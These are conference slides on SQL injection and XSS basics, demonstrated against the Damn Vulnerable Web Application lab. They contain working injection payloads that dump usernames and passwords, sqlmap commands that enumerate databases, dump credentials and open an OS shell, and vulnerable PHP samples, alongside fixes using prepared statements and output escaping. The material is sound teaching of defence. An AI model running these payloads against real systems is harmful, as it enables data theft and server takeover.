Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

/GrandParadePolandwww.grandparade.co.uk

SQL Injection and XSS - Basics
with examples on Damn Vulnerable Web Application

Paweł Cygal, Senior System Administrator at Grand Parade


Agenda:
- What is SQL Injection?
- SQLMAP
- What is Cross site scripting?
- Example of Session Hijacking


SQL Injection
- SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

- SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.


XSS
- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (but not always). XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Its effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.


SQL Injection – what is wrong here?

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>


Answer

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

In this example the user can type anything into the id field, for example: 1' or 1=1 --

Do not trust user input!!!


Examples:
1' or 1=1 --
1' union select 1,2 from users; --
1' union select version(),user() from users; --
1' union select user,password from users; --
-1' union select user,password from users; --
-1' union select table_name,2 from information_schema.tables; --
-1' union select column_name,2 from information_schema.columns; --
-1' union select "zaslepka", concat(user,":",password) from users; --

SQLMAP:

Current database:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=4k2qlghmpl74famhq4eejigki0; security=low' --current-db

List of all databases:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --dbs

Show tables:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa --tables

Show columns:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users --columns

Show user and password:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users -C user,password --dump

Insert a shell:
sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --current-db --os-shell


Solution
- Prepared statements
  Placeholders (WHERE a = ? ... WHERE a = :col), then prepare and execute
- Stored procedures
- Escaping special chars (mysql_real_escape_string)
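As an added example (not code from the slides or from DVWA), the user_id lookup from the vulnerable slide next to a prepared-statement version with a type check in front of it. An in-memory SQLite database with constructed rows stands in for DVWA's MySQL so the script runs on its own; the table layout and the sample users are assumptions.

```php
<?php
// Added example, not code from the slides or from DVWA. SQLite in memory with
// constructed rows replaces DVWA's MySQL so this runs stand-alone (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown')"); // constructed data

// The slide's pattern: $id is spliced into the SQL text, so a quote in the
// input ends the literal and the rest of the input becomes SQL.
function lookupUnsafe(PDO $pdo, string $id): array
{
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: check the type first, then send the value as a bound parameter.
// The SQL text is fixed at prepare time; the parameter is only ever data.
function lookupSafe(PDO $pdo, string $id): array
{
    $userId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($userId === false) {
        return []; // not a positive integer: reject it, do not try to "clean" it
    }
    $stmt = $pdo->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id');
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "1' or 1=1 -- "; // the injection string from the slides
printf("unsafe, payload : %d row(s)\n", count(lookupUnsafe($pdo, $payload))); // the whole table comes back
printf("safe, payload   : %d row(s)\n", count(lookupSafe($pdo, $payload)));   // rejected by the type check
printf("safe, id=2      : %s\n", json_encode(lookupSafe($pdo, '2')));        // one matching row
```

With MySQL the same code works through the mysql PDO driver; the placeholder syntax (? or :name) is the one the Solution slide lists.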


Cross site scripting – what is wrong here?

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>


Answer

No data validation for user input. The user can type whatever they want, for example HTML tags or some JavaScript code, and it is echoed back into the page as-is.

Do not trust the user!!!


Solution

Escape special chars
- htmlspecialchars
- addslashes

Always validate input from user
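As an added example (not code from the slides or from DVWA), the greeting from the XSS slide rewritten with htmlspecialchars for the HTML context, plus an allow-list check on the name as the "always validate" point suggests. addslashes is run on the same input for comparison: it only backslash-escapes quotes and leaves the tags intact, so it does not protect HTML output. The name pattern and the test string are assumptions.

```php
<?php
// Added example, not code from the slides or from DVWA.

// The slide's pattern: the raw query-string value is concatenated into HTML.
function greetUnsafe(string $name): string
{
    return '<pre>Hello ' . $name . '</pre>';
}

// Output encoding for the HTML body context. ENT_QUOTES encodes both quote
// styles (needed the moment the value lands inside an attribute), and the
// explicit UTF-8 charset keeps malformed multibyte input from slipping past.
function greetSafe(string $name): string
{
    return '<pre>Hello ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Validation to go with the encoding (assumed rule): a name is letters,
// spaces, hyphens and apostrophes, 1 to 64 characters; anything else is rejected.
function isValidName(string $name): bool
{
    return preg_match('/^[\p{L} \'\-]{1,64}$/u', $name) === 1;
}

$input = "<script>alert('xss')</script>"; // constructed probe string

echo greetUnsafe($input), "\n";   // the script tag reaches the browser untouched
echo greetSafe($input), "\n";     // angle brackets and quotes become entities
echo addslashes($input), "\n";    // only the quotes get backslashes; <script> survives
var_dump(isValidName('Gordon Brown'), isValidName($input)); // accepted, rejected
```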


The end
Thank you